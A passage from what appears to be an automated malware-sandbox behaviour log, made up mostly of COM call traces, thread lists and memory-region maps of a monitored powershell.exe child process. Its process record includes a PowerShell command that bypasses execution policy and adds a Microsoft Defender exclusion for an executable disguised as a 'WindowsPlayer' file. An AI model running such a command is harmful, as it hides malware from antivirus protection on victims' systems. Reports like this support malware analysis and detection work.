(pv=0x15a7010) [0391.201] CoTaskMemFree (pv=0x15a6690) [0391.201] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0391.202] ObjectStublessClient3 () [0391.202] ObjectStublessClient3 () [0391.203] ObjectStublessClient3 () [0391.221] ObjectStublessClient8 () [0391.223] CoTaskMemFree (pv=0x4c6040) [0391.223] CoTaskMemFree (pv=0x52f190) [0391.223] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0391.223] ObjectStublessClient3 () [0391.224] ObjectStublessClient3 () [0391.225] ObjectStublessClient3 () [0391.226] ObjectStublessClient8 () [0391.228] CoTaskMemFree (pv=0x4c7480) [0391.228] CoTaskMemFree (pv=0x52f6e0) [0391.228] IUnknown:Release (This=0x4b4468) returned 0x0 [0391.228] ObjectStublessClient3 () [0391.229] ObjectStublessClient3 () [0391.229] ObjectStublessClient3 () [0391.238] ObjectStublessClient8 () [0391.271] CoTaskMemFree (pv=0x4b3cf0) [0391.271] CoTaskMemFree (pv=0x52f190) [0391.271] IUnknown:Release (This=0x4b4548) returned 0x0 [0391.271] ObjectStublessClient3 () [0391.272] ObjectStublessClient3 () [0391.272] ObjectStublessClient3 () [0391.274] ObjectStublessClient8 () [0391.306] CoTaskMemFree (pv=0x52ebf0) [0391.306] CoTaskMemFree (pv=0x158f100) [0391.306] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0391.307] ObjectStublessClient3 () [0391.307] ObjectStublessClient3 () [0391.308] ObjectStublessClient3 () [0391.309] ObjectStublessClient8 () [0391.339] CoTaskMemFree (pv=0x52f6e0) [0391.339] CoTaskMemFree (pv=0x158ebc0) [0391.339] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0391.340] ObjectStublessClient3 () [0391.341] ObjectStublessClient3 () [0391.341] ObjectStublessClient3 () [0391.342] ObjectStublessClient8 () [0391.374] CoTaskMemFree (pv=0x4c8600) [0391.374] CoTaskMemFree (pv=0x4c9280) [0391.374] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0391.375] ObjectStublessClient3 () [0391.375] ObjectStublessClient3 () [0391.376] ObjectStublessClient3 () [0391.377] ObjectStublessClient8 () [0391.409] CoTaskMemFree (pv=0x4c8600) [0391.409] CoTaskMemFree (pv=0x4b3dd0) [0391.409] IUnknown:Release (This=0x4b4468) returned 0x0 [0391.410] ObjectStublessClient3 () [0391.410] ObjectStublessClient3 () [0391.411] ObjectStublessClient3 () [0391.412] ObjectStublessClient8 () [0391.445] CoTaskMemFree (pv=0x15a7390) [0391.445] CoTaskMemFree (pv=0x15a7010) [0391.445] IUnknown:Release (This=0x4b4548) returned 0x0 [0391.537] ObjectStublessClient3 () [0391.541] ObjectStublessClient3 () [0391.543] ObjectStublessClient3 () [0391.551] ObjectStublessClient8 () [0391.566] CoTaskMemFree (pv=0x4c8600) [0391.566] CoTaskMemFree (pv=0x4b0590) [0391.566] IUnknown:Release (This=0x4b4468) returned 0x0 [0391.566] ObjectStublessClient3 () [0391.567] ObjectStublessClient3 () [0391.568] ObjectStublessClient3 () [0391.576] ObjectStublessClient8 () [0391.577] CoTaskMemFree (pv=0x4b4540) [0391.577] CoTaskMemFree (pv=0x15a6950) [0391.577] IUnknown:Release (This=0x4b40e8) returned 0x0 [0391.577] ObjectStublessClient3 () [0391.578] ObjectStublessClient3 () [0391.578] ObjectStublessClient3 () [0391.579] ObjectStublessClient8 () [0391.585] CoTaskMemFree (pv=0x52f050) [0391.585] CoTaskMemFree (pv=0x52ef60) [0391.585] IUnknown:Release (This=0x4b4468) returned 0x0 [0391.586] ObjectStublessClient3 () [0391.587] ObjectStublessClient3 () [0391.587] ObjectStublessClient3 () [0391.588] ObjectStublessClient8 () [0391.594] CoTaskMemFree (pv=0x52f6e0) [0391.594] CoTaskMemFree (pv=0x52ebf0) [0391.594] IUnknown:Release (This=0x4b3eb8) returned 0x0 [0391.595] ObjectStublessClient3 () [0391.595] ObjectStublessClient3 () [0391.596] ObjectStublessClient3 () [0391.601] ObjectStublessClient8 () [0391.607] CoTaskMemFree (pv=0x158f2e0) [0391.607] CoTaskMemFree (pv=0x158ef20) [0391.607] IUnknown:Release (This=0x4b4548) returned 0x0 [0391.608] ObjectStublessClient3 () [0391.609] ObjectStublessClient3 () [0391.609] ObjectStublessClient3 () [0391.615] ObjectStublessClient8 () [0391.616] CoTaskMemFree (pv=0x15a7050) [0391.616] CoTaskMemFree (pv=0x15a7390) [0391.616] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0391.617] ObjectStublessClient3 () [0391.618] ObjectStublessClient3 () [0391.618] ObjectStublessClient3 () [0391.623] ObjectStublessClient8 () [0391.625] CoTaskMemFree (pv=0x52f190) [0391.625] CoTaskMemFree (pv=0x52ebf0) [0391.625] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0391.626] ObjectStublessClient3 () [0391.626] ObjectStublessClient3 () [0391.627] ObjectStublessClient3 () [0391.633] ObjectStublessClient8 () [0391.640] CoTaskMemFree (pv=0x52f6e0) [0391.640] CoTaskMemFree (pv=0x52ef60) [0391.641] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0391.641] ObjectStublessClient3 () [0391.641] ObjectStublessClient3 () [0391.642] ObjectStublessClient3 () [0391.647] ObjectStublessClient8 () [0391.650] CoTaskMemFree (pv=0x52f050) [0391.650] CoTaskMemFree (pv=0x158f040) [0391.650] IUnknown:Release (This=0x4b4468) returned 0x0 [0391.650] ObjectStublessClient3 () [0391.651] ObjectStublessClient3 () [0391.652] ObjectStublessClient3 () [0391.653] ObjectStublessClient8 () [0391.658] CoTaskMemFree (pv=0x15a7010) [0391.658] CoTaskMemFree (pv=0x158ec80) [0391.658] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0391.659] ObjectStublessClient3 () [0391.659] ObjectStublessClient3 () [0391.660] ObjectStublessClient3 () [0391.661] ObjectStublessClient8 () [0391.668] CoTaskMemFree (pv=0x52ebf0) [0391.668] CoTaskMemFree (pv=0x52ef60) [0391.668] IUnknown:Release (This=0x4b40e8) returned 0x0 [0391.668] ObjectStublessClient3 () [0391.669] ObjectStublessClient3 () [0391.669] ObjectStublessClient3 () [0391.675] ObjectStublessClient8 () [0391.682] CoTaskMemFree (pv=0x15a6690) [0391.682] CoTaskMemFree (pv=0x15a7410) [0391.682] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0391.682] ObjectStublessClient3 () [0391.683] ObjectStublessClient3 () [0391.683] ObjectStublessClient3 () [0391.688] ObjectStublessClient8 () [0391.694] CoTaskMemFree (pv=0x15a7010) [0391.694] CoTaskMemFree (pv=0x15a6c50) [0391.694] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0391.696] ObjectStublessClient3 () [0391.697] ObjectStublessClient3 () [0391.698] ObjectStublessClient3 () [0391.708] ObjectStublessClient8 () [0391.709] CoTaskMemFree (pv=0x52ebf0) [0391.709] CoTaskMemFree (pv=0x52f190) [0391.709] IUnknown:Release (This=0x4b40e8) returned 0x0 [0391.710] ObjectStublessClient3 () [0391.710] ObjectStublessClient3 () [0391.711] ObjectStublessClient3 () [0391.712] ObjectStublessClient8 () [0391.718] CoTaskMemFree (pv=0x158f400) [0391.719] CoTaskMemFree (pv=0x158f340) [0391.719] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0391.720] ObjectStublessClient3 () [0391.720] ObjectStublessClient3 () [0391.721] ObjectStublessClient3 () [0391.722] ObjectStublessClient8 () [0391.727] CoTaskMemFree (pv=0x4c8f80) [0391.727] CoTaskMemFree (pv=0x52f050) [0391.727] IUnknown:Release (This=0x4b40e8) returned 0x0 [0391.728] ObjectStublessClient3 () [0391.728] ObjectStublessClient3 () [0391.729] ObjectStublessClient3 () [0391.730] ObjectStublessClient8 () [0391.732] CoTaskMemFree (pv=0x52ebf0) [0391.732] CoTaskMemFree (pv=0x4b3cf0) [0391.732] IUnknown:Release (This=0x4b3dd8) returned 0x0 [0391.732] ObjectStublessClient3 () [0391.733] ObjectStublessClient3 () [0391.733] ObjectStublessClient3 () [0391.741] ObjectStublessClient8 () [0391.747] CoTaskMemFree (pv=0x4c8700) [0391.747] CoTaskMemFree (pv=0x15a7050) [0391.747] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0391.747] ObjectStublessClient3 () [0391.748] ObjectStublessClient3 () [0391.748] ObjectStublessClient3 () [0391.755] ObjectStublessClient8 () [0391.761] CoTaskMemFree (pv=0x52ebf0) [0391.761] CoTaskMemFree (pv=0x52f6e0) [0391.761] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0391.762] ObjectStublessClient3 () [0391.762] ObjectStublessClient3 () [0391.763] ObjectStublessClient3 () [0391.768] ObjectStublessClient8 () [0391.775] CoTaskMemFree (pv=0x158f9a0) [0391.775] CoTaskMemFree (pv=0x4b45b0) [0391.775] IUnknown:Release (This=0x4b4468) returned 0x0 [0391.776] ObjectStublessClient3 () [0391.776] ObjectStublessClient3 () [0391.777] ObjectStublessClient3 () [0391.782] ObjectStublessClient8 () [0391.788] CoTaskMemFree (pv=0x158f220) [0391.788] CoTaskMemFree (pv=0x52ece0) [0391.788] IUnknown:Release (This=0x4b3eb8) returned 0x0 [0391.789] ObjectStublessClient3 () [0391.790] ObjectStublessClient3 () [0391.790] ObjectStublessClient3 () [0391.795] ObjectStublessClient8 () [0391.802] CoTaskMemFree (pv=0x158ebc0) [0391.802] CoTaskMemFree (pv=0x52ebf0) [0391.802] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0391.803] ObjectStublessClient3 () [0391.803] ObjectStublessClient3 () [0391.804] ObjectStublessClient3 () [0391.810] ObjectStublessClient8 () [0391.816] CoTaskMemFree (pv=0x15a7010) [0391.816] CoTaskMemFree (pv=0x158efe0) [0391.816] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0391.817] ObjectStublessClient3 () [0391.818] ObjectStublessClient3 () [0391.818] ObjectStublessClient3 () [0391.826] ObjectStublessClient8 () [0391.827] CoTaskMemFree (pv=0x4b0080) [0391.827] CoTaskMemFree (pv=0x52ebf0) [0391.828] IUnknown:Release (This=0x4b4468) returned 0x0 [0391.828] ObjectStublessClient3 () [0391.829] ObjectStublessClient3 () [0391.829] ObjectStublessClient3 () [0391.830] ObjectStublessClient8 () [0391.833] CoTaskMemFree (pv=0x52f6e0) [0391.833] CoTaskMemFree (pv=0x52ebf0) [0391.833] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0391.833] ObjectStublessClient3 () [0391.834] ObjectStublessClient3 () [0391.834] ObjectStublessClient3 () [0391.835] ObjectStublessClient8 () [0391.839] CoTaskMemFree (pv=0x158f400) [0391.839] CoTaskMemFree (pv=0x158eec0) [0391.839] IUnknown:Release (This=0x4b40e8) returned 0x0 [0391.839] ObjectStublessClient3 () [0391.840] ObjectStublessClient3 () [0391.840] ObjectStublessClient3 () [0391.841] ObjectStublessClient8 () [0391.849] CoTaskMemFree (pv=0x4b3eb0) [0391.849] CoTaskMemFree (pv=0x4b3dd0) [0391.850] IUnknown:Release (This=0x4b40e8) returned 0x0 [0391.850] ObjectStublessClient3 () [0391.851] ObjectStublessClient3 () [0391.851] ObjectStublessClient3 () [0391.853] ObjectStublessClient8 () [0391.859] CoTaskMemFree (pv=0x52f6e0) [0391.859] CoTaskMemFree (pv=0x158ec80) [0391.859] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0391.860] ObjectStublessClient3 () [0391.861] ObjectStublessClient3 () [0391.861] ObjectStublessClient3 () [0391.862] ObjectStublessClient8 () [0391.868] CoTaskMemFree (pv=0x52ebf0) [0391.868] CoTaskMemFree (pv=0x158eec0) [0391.868] IUnknown:Release (This=0x4b40e8) returned 0x0 [0391.868] ObjectStublessClient3 () [0391.869] ObjectStublessClient3 () [0391.870] ObjectStublessClient3 () [0391.871] ObjectStublessClient8 () [0391.880] CoTaskMemFree (pv=0x158ebc0) [0391.880] CoTaskMemFree (pv=0x4b3dd0) [0391.880] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0391.880] ObjectStublessClient3 () [0391.881] ObjectStublessClient3 () [0391.882] ObjectStublessClient3 () [0391.889] ObjectStublessClient8 () [0391.891] CoTaskMemFree (pv=0x15a7010) [0391.891] CoTaskMemFree (pv=0x52f6e0) [0391.891] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0391.892] ObjectStublessClient3 () [0391.892] ObjectStublessClient3 () [0391.893] ObjectStublessClient3 () [0391.895] ObjectStublessClient8 () [0391.902] CoTaskMemFree (pv=0x15a7010) [0391.902] CoTaskMemFree (pv=0x158f160) [0391.902] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0391.903] ObjectStublessClient3 () [0391.903] ObjectStublessClient3 () [0391.904] ObjectStublessClient3 () [0391.911] ObjectStublessClient8 () [0391.918] CoTaskMemFree (pv=0x15a6690) [0391.918] CoTaskMemFree (pv=0x52f190) [0391.918] IUnknown:Release (This=0x4b40e8) returned 0x0 [0391.919] ObjectStublessClient3 () [0391.920] ObjectStublessClient3 () [0391.920] ObjectStublessClient3 () [0391.922] ObjectStublessClient8 () [0391.930] CoTaskMemFree (pv=0x15a7050) [0391.930] CoTaskMemFree (pv=0x52f6e0) [0391.930] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0391.931] ObjectStublessClient3 () [0391.931] ObjectStublessClient3 () [0391.932] ObjectStublessClient3 () [0391.934] ObjectStublessClient8 () [0391.942] CoTaskMemFree (pv=0x15a7010) [0391.942] CoTaskMemFree (pv=0x52f050) [0391.943] IUnknown:Release (This=0x4b40e8) returned 0x0 [0391.943] ObjectStublessClient3 () [0391.944] ObjectStublessClient3 () [0391.945] ObjectStublessClient3 () [0391.946] ObjectStublessClient8 () [0391.954] CoTaskMemFree (pv=0x52ebf0) [0391.954] CoTaskMemFree (pv=0x158f9a0) [0391.954] IUnknown:Release (This=0x4b3dd8) returned 0x0 [0391.955] ObjectStublessClient3 () [0391.956] ObjectStublessClient3 () [0391.956] ObjectStublessClient3 () [0391.967] ObjectStublessClient8 () [0391.975] CoTaskMemFree (pv=0x4c8700) [0391.975] CoTaskMemFree (pv=0x158f580) [0391.976] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0391.976] ObjectStublessClient3 () [0391.977] ObjectStublessClient3 () [0391.978] ObjectStublessClient3 () [0391.986] ObjectStublessClient8 () [0391.994] CoTaskMemFree (pv=0x4b4540) [0391.994] CoTaskMemFree (pv=0x4b4460) [0391.994] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0391.994] ObjectStublessClient3 () [0391.995] ObjectStublessClient3 () [0391.996] ObjectStublessClient3 () [0392.003] ObjectStublessClient8 () [0392.013] CoTaskMemFree (pv=0x15a7010) [0392.013] CoTaskMemFree (pv=0x15a6690) [0392.013] IUnknown:Release (This=0x4b3dd8) returned 0x0 [0392.013] ObjectStublessClient3 () [0392.014] IUnknown:Release (This=0x4a7c98) returned 0x0 [0392.101] IUnknown:Release (This=0x4a79f8) returned 0x1 [0392.101] IUnknown:Release (This=0x1757080) returned 0x0 [0392.103] IUnknown:Release (This=0x4a82b8) returned 0x0 [0392.103] IUnknown:Release (This=0x1827bc8) returned 0x1 [0392.103] IUnknown:Release (This=0x158d5e0) returned 0x0 [0392.366] CoCreateInstance (in: rclsid=0x7fffb3d76cc8*(Data1=0x752073a1, Data2=0x23f2, Data3=0x4396, Data4=([0]=0x85, [1]=0xf0, [2]=0x8f, [3]=0xdb, [4]=0x87, [5]=0x9e, [6]=0xd0, [7]=0xed)), pUnkOuter=0x0, dwClsContext=0x15, riid=0x7fffb3d54150*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5ed8e0 | out: ppv=0x5ed8e0*=0x1757590) returned 0x0 [0392.372] IUnknown:QueryInterface (in: This=0x1757590, riid=0x7fffb3d76cb8*(Data1=0x75207391, Data2=0x23f2, Data3=0x4396, Data4=([0]=0x85, [1]=0xf0, [2]=0x8f, [3]=0xdb, [4]=0x87, [5]=0x9e, [6]=0xd0, [7]=0xed)), ppvObject=0x5ed8c0 | out: ppvObject=0x5ed8c0*=0x4b40e8) returned 0x0 [0392.373] ObjectStublessClient3 () [0392.373] ObjectStublessClient8 () [0396.863] ObjectStublessClient7 () [0396.864] ObjectStublessClient6 () Thread: id = 193 os_tid = 0xe84 Thread: id = 194 os_tid = 0xf1c Thread: id = 195 os_tid = 0x94c [0219.032] DllCanUnloadNow () returned 0x1 [0219.032] DllCanUnloadNow () returned 0x1 [0339.082] DllCanUnloadNow () returned 0x1 [0339.083] DllCanUnloadNow () returned 0x1 [0389.325] DllCanUnloadNow () returned 0x1 [0389.326] DllCanUnloadNow () returned 0x1 [0390.043] DllCanUnloadNow () returned 0x1 [0390.043] DllCanUnloadNow () returned 0x1 Thread: id = 196 os_tid = 0x99c Thread: id = 197 os_tid = 0x960 Thread: id = 198 os_tid = 0x8e8 Thread: id = 347 os_tid = 0x16b8 Thread: id = 348 os_tid = 0xe4 Thread: id = 349 os_tid = 0x9ac Process: id = "8" image_name = "powershell.exe" filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x6f77f000" os_pid = "0xd0c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x1518" cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe'" cur_dir = "C:\\Users\\OqXZRaykm\\Desktop\\" os_username = "PXTHFFRYO7\\OqXZRaykm" bitness = "32" os_groups = "PXTHFFRYO7\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001bd08" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2285 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2286 start_va = 0x30000 end_va = 0x4cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2287 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2288 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 2289 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 2290 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 2291 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2292 start_va = 0x7ffe0000 end_va = 0x7ffe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2293 start_va = 0x7ff5fffc0000 end_va = 0x7ff5fffc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffc0000" filename = "" Region: id = 2294 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 2295 start_va = 0x7ff733240000 end_va = 0x7ff7332b0fff monitored = 0 entry_point = 0x7ff733243d40 region_type = mapped_file name = "powershell.exe" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe") Region: id = 2296 start_va = 0x7fffcca30000 end_va = 0x7fffccc23fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2298 start_va = 0x7ff5fdfb0000 end_va = 0x7ff5fffb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff5fdfb0000" filename = "" Region: id = 2299 start_va = 0x7ff4fdf90000 end_va = 0x7ff5fdfaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff4fdf90000" filename = "" Region: id = 2300 start_va = 0x400000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2301 start_va = 0x7fffcb440000 end_va = 0x7fffcb4fcfff monitored = 0 entry_point = 0x7fffcb457070 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2302 start_va = 0x7fffca790000 end_va = 0x7fffcaa56fff monitored = 0 entry_point = 0x7fffca7a1bd0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2303 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2304 start_va = 0x7ff4fde90000 end_va = 0x7ff4fdf8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff4fde90000" filename = "" Region: id = 2305 start_va = 0x100000 end_va = 0x1c8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2385 start_va = 0x7fffcb560000 end_va = 0x7fffcb5fdfff monitored = 0 entry_point = 0x7fffcb567850 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2386 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2387 start_va = 0x530000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2388 start_va = 0x7fffcb350000 end_va = 0x7fffcb424fff monitored = 0 entry_point = 0x7fffcb36d190 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2389 start_va = 0x7fffca560000 end_va = 0x7fffca5fcfff monitored = 0 entry_point = 0x7fffca575390 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 2390 start_va = 0x7fffca270000 end_va = 0x7fffca36ffff monitored = 0 entry_point = 0x7fffca285ac0 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 2391 start_va = 0x7fffcbb90000 end_va = 0x7fffcbee3fff monitored = 0 entry_point = 0x7fffcbc81d00 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2392 start_va = 0x7fffcc830000 end_va = 0x7fffcc952fff monitored = 0 entry_point = 0x7fffcc88da30 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2393 start_va = 0x7fffcb600000 end_va = 0x7fffcb6a9fff monitored = 0 entry_point = 0x7fffcb615470 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2394 start_va = 0x7fffcb2a0000 end_va = 0x7fffcb33afff monitored = 0 entry_point = 0x7fffcb2bc3e0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2395 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2396 start_va = 0x7fffb5880000 end_va = 0x7fffb589cfff monitored = 0 entry_point = 0x7fffb5881de0 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 2397 start_va = 0x7fffcb7a0000 end_va = 0x7fffcb93ffff monitored = 0 entry_point = 0x7fffcb7b7a10 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2398 start_va = 0x7fffca760000 end_va = 0x7fffca781fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "win32u.dll" filename = "\\Windows\\System32\\win32u.dll" (normalized: "c:\\windows\\system32\\win32u.dll") Region: id = 2399 start_va = 0x7fffcc960000 end_va = 0x7fffcc989fff monitored = 0 entry_point = 0x7fffcc9648d0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2400 start_va = 0x7fffca370000 end_va = 0x7fffca479fff monitored = 0 entry_point = 0x7fffca3a1300 region_type = mapped_file name = "gdi32full.dll" filename = "\\Windows\\System32\\gdi32full.dll" (normalized: "c:\\windows\\system32\\gdi32full.dll") Region: id = 2401 start_va = 0x7fffcbef0000 end_va = 0x7fffcc018fff monitored = 0 entry_point = 0x7fffcbf16140 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2402 start_va = 0x7fffae2a0000 end_va = 0x7fffae304fff monitored = 1 entry_point = 0x7fffae2cbd50 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll") Region: id = 2403 start_va = 0x630000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 2404 start_va = 0x1d0000 end_va = 0x1d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2405 start_va = 0x1e0000 end_va = 0x1e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2406 start_va = 0x480000 end_va = 0x4adfff monitored = 0 entry_point = 0x4814d0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2407 start_va = 0x820000 end_va = 0xa1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 2408 start_va = 0x7fffcb940000 end_va = 0x7fffcb96ffff monitored = 0 entry_point = 0x7fffcb9414d0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2409 start_va = 0x630000 end_va = 0x7b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 2410 start_va = 0x810000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 2411 start_va = 0xa20000 end_va = 0x1e20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a20000" filename = "" Region: id = 2412 start_va = 0x1f0000 end_va = 0x1f2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "powershell.exe.mui" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui") Region: id = 2413 start_va = 0x480000 end_va = 0x480fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 2414 start_va = 0x490000 end_va = 0x490fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 2415 start_va = 0x4a0000 end_va = 0x4a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 2416 start_va = 0x1e30000 end_va = 0x1eeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e30000" filename = "" Region: id = 2417 start_va = 0x4b0000 end_va = 0x4b6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 2418 start_va = 0x7fffabe90000 end_va = 0x7fffabf38fff monitored = 1 entry_point = 0x7fffabe98150 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll") Region: id = 2419 start_va = 0x7fffcb970000 end_va = 0x7fffcb9c4fff monitored = 0 entry_point = 0x7fffcb97a7e0 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: 